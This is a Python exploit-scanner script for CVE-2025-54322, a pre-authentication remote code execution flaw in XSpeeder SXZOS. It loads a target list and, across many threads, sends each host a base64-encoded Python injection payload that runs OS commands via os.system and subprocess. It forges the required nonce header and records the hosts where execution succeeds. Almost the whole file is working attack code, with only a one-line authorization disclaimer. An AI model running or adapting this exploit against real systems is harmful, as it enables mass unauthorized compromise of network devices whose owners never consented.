#!/usr/bin/env python3
"""XSpeeder SXZOS (CVE-2025-54322) pre-auth RCE checker.

Reads a list of base URLs from a file, probes each one concurrently and
records the hosts whose response contains the output of the ``id`` command.
Only vulnerable hosts are printed; they are also appended to
``vuln-confirm.txt``.

Usage:
    python3 scanner.py <targets_file> [threads]

NOTE: this tool sends a command-execution probe. Run it only against systems
you own or are explicitly authorized to test.
"""
import re
import sys
import time
from base64 import b64encode
from concurrent.futures import ThreadPoolExecutor, as_completed
from threading import Lock

import requests
import urllib3
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from urllib3.exceptions import InsecureRequestWarning as URLLib3InsecureWarning

# By Chirag Artani

# Disable all SSL warnings (every request below is sent with verify=False).
urllib3.disable_warnings(URLLib3InsecureWarning)
urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# File that receives one record per vulnerable host plus a run summary.
OUTPUT_FILE = 'vuln-confirm.txt'

# Thread-safe locks: one serializes stdout, the other serializes file appends.
print_lock = Lock()
file_lock = Lock()


def safe_print(message):
    """Print *message* while holding the global print lock."""
    with print_lock:
        print(message)


def write_vulnerable(url, output, status):
    """Append one vulnerable-host record to the output file.

    The write happens under ``file_lock`` so records produced by different
    threads are not interleaved.

    Args:
        url: Target that was flagged.
        output: Evidence captured from the response.
        status: Human-readable verdict string.
    """
    with file_lock:
        with open(OUTPUT_FILE, 'a') as f:
            f.write(f"{url}\n")
            f.write(f"Status: {status}\n")
            f.write(f"Output: {output}\n")
            f.write("-" * 70 + "\n")


class SSLAdapter(HTTPAdapter):
    """Transport adapter whose pool manager skips certificate checks."""

    def init_poolmanager(self, *args, **kwargs):
        """Create the pool manager with certificate validation turned off."""
        kwargs['ssl_version'] = urllib3.util.ssl_.PROTOCOL_TLS
        kwargs['cert_reqs'] = 'CERT_NONE'
        kwargs['assert_hostname'] = False
        return super().init_poolmanager(*args, **kwargs)


class XspeederScanner:
    """Checks a single target URL for CVE-2025-54322."""

    def __init__(self, target_url, max_retries=2, thread_id=None):
        """Store the target and build the HTTP session.

        Args:
            target_url: Base URL of the target; trailing slashes are removed.
            max_retries: Number of full check attempts before giving up.
            thread_id: Caller-supplied identifier; stored but not otherwise
                used by this class.
        """
        self.target_url = target_url.rstrip('/')
        self.max_retries = max_retries
        self.thread_id = thread_id
        self.session = self._create_session()
        # Regex to match uid/gid output from 'id' command
        self.id_regex = re.compile(
            r'uid=\d+\([a-zA-Z0-9_-]+\)\s+gid=\d+\([a-zA-Z0-9_-]+\)'
        )

    def _create_session(self):
        """Create a requests session with SSL bypass and default headers."""
        session = requests.Session()

        # Mount custom SSL adapter for both HTTP and HTTPS
        adapter = SSLAdapter()
        session.mount('http://', adapter)
        session.mount('https://', adapter)

        # Set default headers
        session.headers.update({
            'Connection': 'close',
            'Accept': '*/*',
        })
        return session

    def build_payload(self):
        """Return the base64-encoded probe expression that runs ``id``."""
        cmd = 'id'
        # Use os.system() like original PoC, but capture output
        payload = f'__import__("os").system("{cmd}") or __import__("subprocess").check_output("{cmd}", shell=True).decode() #sUserCodexsPwd'
        encoded_payload = b64encode(payload.encode()).decode("utf-8")
        return encoded_payload

    def calculate_nonce(self):
        """Return the X-SXZ-R header value: whole minutes since epoch mod 7."""
        return str(int(time.time() / 60) % 7)

    def warm_session(self, headers):
        """Issue the preliminary GET to ``/webInfos/``.

        The response is not validated. A timeout is still reported as
        success; any other exception is reported as failure.

        Returns:
            True if the request completed or timed out, False otherwise.
        """
        try:
            warmup_url = f"{self.target_url}/webInfos/"
            self.session.get(
                warmup_url,
                headers=headers,
                verify=False,
                timeout=20,
                allow_redirects=True,
            )
            return True
        except requests.exceptions.Timeout:
            return True
        except Exception:
            return False

    def send_exploit(self, headers, payload):
        """Send the probe request.

        Returns:
            The ``requests.Response``, or None if the request raised.
        """
        try:
            exploit_url = f"{self.target_url}/?title=ABC&oIp=XXX&chkid={payload}"
            response = self.session.get(
                exploit_url,
                headers=headers,
                verify=False,
                timeout=20,
                allow_redirects=False,
            )
            return response
        except Exception:
            return None

    def _classify_response(self, response):
        """Return a positive result dict for *response*, or None if no match."""
        response_text = response.text

        # Look for uid/gid pattern in response
        id_match = self.id_regex.search(response_text)
        if id_match:
            return {
                'vulnerable': True,
                'status': 'VULNERABLE - RCE Confirmed',
                'output': id_match.group(0),
                'status_code': response.status_code,
                'full_response': response_text[:500],
            }

        # Check for other indicators (partial match)
        if 'uid=' in response_text or 'gid=' in response_text:
            return {
                'vulnerable': True,
                'status': 'LIKELY VULNERABLE - Partial match',
                'output': response_text[:200],
                'status_code': response.status_code,
            }

        # Check for error indicators that suggest code execution
        execution_indicators = [
            'CalledProcessError',
            'subprocess',
            'Traceback',
            'NameError',
            'SyntaxError',
            'eval',
        ]
        if any(indicator in response_text for indicator in execution_indicators):
            return {
                'vulnerable': True,
                'status': 'POTENTIALLY VULNERABLE - Code execution indicators found',
                'output': response_text[:300],
                'status_code': response.status_code,
            }

        return None

    def check_vulnerability(self):
        """Run the warm-up + probe sequence, retrying up to ``max_retries``.

        Returns:
            A dict with at least the keys ``vulnerable`` (bool), ``status``
            (str) and ``output`` (str or None). ``status_code`` is included
            whenever a probe response was received.
        """
        for attempt in range(1, self.max_retries + 1):
            can_retry = attempt < self.max_retries
            try:
                # Calculate fresh nonce for each attempt
                headers = {
                    'User-Agent': 'SXZ/2.3',
                    'X-SXZ-R': self.calculate_nonce(),
                    'Accept': '*/*',
                }

                # Step 1: Warm up session
                if not self.warm_session(headers):
                    if can_retry:
                        time.sleep(1)
                        continue
                    return {
                        'vulnerable': False,
                        'status': 'Connection completely failed',
                        'output': None,
                    }

                # Small delay between requests
                time.sleep(0.3)

                # Step 2: Send exploit
                response = self.send_exploit(headers, self.build_payload())
                if response is None:
                    if can_retry:
                        time.sleep(1)
                        continue
                    return {
                        'vulnerable': False,
                        'status': 'Exploit delivery failed',
                        'output': None,
                    }

                # Step 3: Check response for 'id' command output
                finding = self._classify_response(response)
                if finding is not None:
                    return finding

                # If no match and we have retries left, try again
                if can_retry:
                    time.sleep(1)
                    continue

                return {
                    'vulnerable': False,
                    'status': 'Not vulnerable',
                    'output': None,
                    'status_code': response.status_code,
                }

            except Exception as e:
                if can_retry:
                    time.sleep(1)
                    continue
                return {
                    'vulnerable': False,
                    'status': f'Error: {str(e)[:100]}',
                    'output': None,
                }

        # Only reached when max_retries < 1 and the loop body never ran.
        return {
            'vulnerable': False,
            'status': 'Max retries exceeded',
            'output': None,
        }


def load_targets(filename):
    """Load targets from *filename*, one per line.

    Blank lines and lines whose first non-blank character is ``#`` are
    skipped. Exits the process with status 1 if the file cannot be read.

    Returns:
        List of stripped target strings.
    """
    try:
        with open(filename, 'r') as f:
            # Strip first so indented comment lines are skipped as well.
            stripped_lines = (line.strip() for line in f)
            return [
                entry for entry in stripped_lines
                if entry and not entry.startswith('#')
            ]
    except FileNotFoundError:
        print(f"[-] Error: File '{filename}' not found")
        sys.exit(1)
    except Exception as e:
        print(f"[-] Error reading file: {e}")
        sys.exit(1)


def scan_target(target, thread_id):
    """Scan a single target (thread worker function).

    Returns:
        Tuple ``(target, result)`` where *result* is the dict produced by
        ``XspeederScanner.check_vulnerability``.
    """
    scanner = XspeederScanner(target, max_retries=2, thread_id=thread_id)
    try:
        result = scanner.check_vulnerability()
    finally:
        # Release the session's connection pools once this target is done.
        scanner.session.close()
    return target, result


def print_vulnerable(target, result):
    """Print one vulnerable result as a single thread-safe message."""
    output = []
    output.append(f"\n{'=' * 70}")
    output.append(f"[+] VULNERABLE: {target}")
    output.append(f"[+] Status: {result['status']}")
    if 'status_code' in result:
        output.append(f"[+] HTTP Status: {result['status_code']}")
    output.append(f"[+] Output: {result['output']}")
    output.append(f"{'=' * 70}\n")
    safe_print('\n'.join(output))


def _build_banner():
    """Return the boxed start-up banner text."""
    inner_width = 63
    rule = "═" * inner_width
    captions = (
        "XSpeeder SXZOS (CVE-2025-54322) RCE Scanner",
        "Pre-Auth Root RCE Vulnerability Checker",
        "Showing: VULNERABLE HOSTS ONLY",
    )
    rows = [f"╔{rule}╗"]
    rows.extend(f"║{caption.center(inner_width)}║" for caption in captions)
    rows.append(f"╚{rule}╝")
    return "\n" + "\n".join(rows) + "\n"


def main():
    """Parse arguments, scan all targets concurrently and write the summary."""
    print(_build_banner())

    if len(sys.argv) < 2 or len(sys.argv) > 3:
        print("[-] Usage: python3 scanner.py <targets_file> [threads]")
        print("[-] Example: python3 scanner.py targets.txt 20")
        print("[-] Default threads: 10")
        sys.exit(1)

    targets_file = sys.argv[1]
    try:
        max_threads = int(sys.argv[2]) if len(sys.argv) == 3 else 10
    except ValueError:
        # A non-numeric thread count is reported like an out-of-range one.
        print("[-] Thread count must be between 1 and 50")
        sys.exit(1)

    # Validate thread count
    if max_threads < 1 or max_threads > 50:
        print("[-] Thread count must be between 1 and 50")
        sys.exit(1)

    targets = load_targets(targets_file)

    # Clear the output file
    with open(OUTPUT_FILE, 'w') as f:
        f.write("XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts\n")
        f.write(f"Scan started: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
        f.write("=" * 70 + "\n\n")

    print(f"[*] Loaded {len(targets)} targets from {targets_file}")
    print(f"[*] Using {max_threads} concurrent threads")
    print(f"[*] Vulnerable hosts will be saved to: {OUTPUT_FILE}")
    print("[*] Starting scan...\n")

    vulnerable_count = 0
    processed = 0
    start_time = time.time()

    # Threading with ThreadPoolExecutor
    with ThreadPoolExecutor(max_workers=max_threads) as executor:
        # Submit all tasks
        future_to_target = {
            executor.submit(scan_target, target, i): target
            for i, target in enumerate(targets, 1)
        }

        try:
            # Process completed tasks
            for future in as_completed(future_to_target):
                target = future_to_target[future]
                processed += 1
                try:
                    target_url, result = future.result()
                except Exception as e:
                    safe_print(f"[!] Error processing {target}: {e}")
                else:
                    # Only print and save if vulnerable
                    if result['vulnerable']:
                        vulnerable_count += 1
                        print_vulnerable(target_url, result)
                        write_vulnerable(
                            target_url, result['output'], result['status']
                        )

                # Print progress every 50 hosts
                if processed % 50 == 0:
                    safe_print(
                        f"[*] Progress: {processed}/{len(targets)} | "
                        f"Found: {vulnerable_count} vulnerable"
                    )
        except KeyboardInterrupt:
            safe_print(
                "\n\n[!] Scan interrupted by user. "
                "Waiting for active threads to finish..."
            )
            # Drop everything still queued so only in-flight scans are
            # awaited; cancel() is a no-op for running or finished futures.
            for pending in future_to_target:
                pending.cancel()
            executor.shutdown(wait=True)

    elapsed_time = time.time() - start_time

    # Guard the ratios: nothing may have been processed (empty target list
    # or an early interrupt).
    if processed:
        success_rate = vulnerable_count / processed * 100
        average_time = elapsed_time / processed
    else:
        success_rate = 0.0
        average_time = 0.0

    # Final Summary
    print(f"\n{'=' * 70}")
    print("[*] SCAN COMPLETE")
    print(f"{'=' * 70}")
    print(f"[*] Total Time: {elapsed_time:.2f} seconds")
    print(f"[*] Total Targets Scanned: {processed}")
    print(f"[*] Vulnerable Hosts Found: {vulnerable_count}")
    print(f"[*] Success Rate: {success_rate:.2f}%")
    print(f"[*] Average Time per Target: {average_time:.2f} seconds")
    print(f"{'=' * 70}\n")

    if vulnerable_count > 0:
        print(f"[+] All vulnerable hosts saved to: {OUTPUT_FILE}")
        print(f"[+] Total vulnerable: {vulnerable_count}/{processed}")
    else:
        print("[-] No vulnerable hosts found")

    # Append summary to file
    with open(OUTPUT_FILE, 'a') as f:
        f.write("\n" + "=" * 70 + "\n")
        f.write(f"Scan completed: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
        f.write(f"Total scanned: {processed}\n")
        f.write(f"Vulnerable: {vulnerable_count}\n")
        f.write(f"Time taken: {elapsed_time:.2f} seconds\n")


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\n\n[!] Script terminated by user")
        sys.exit(0)
    except Exception as e:
        print(f"\n[!] Fatal error: {e}")
        sys.exit(1)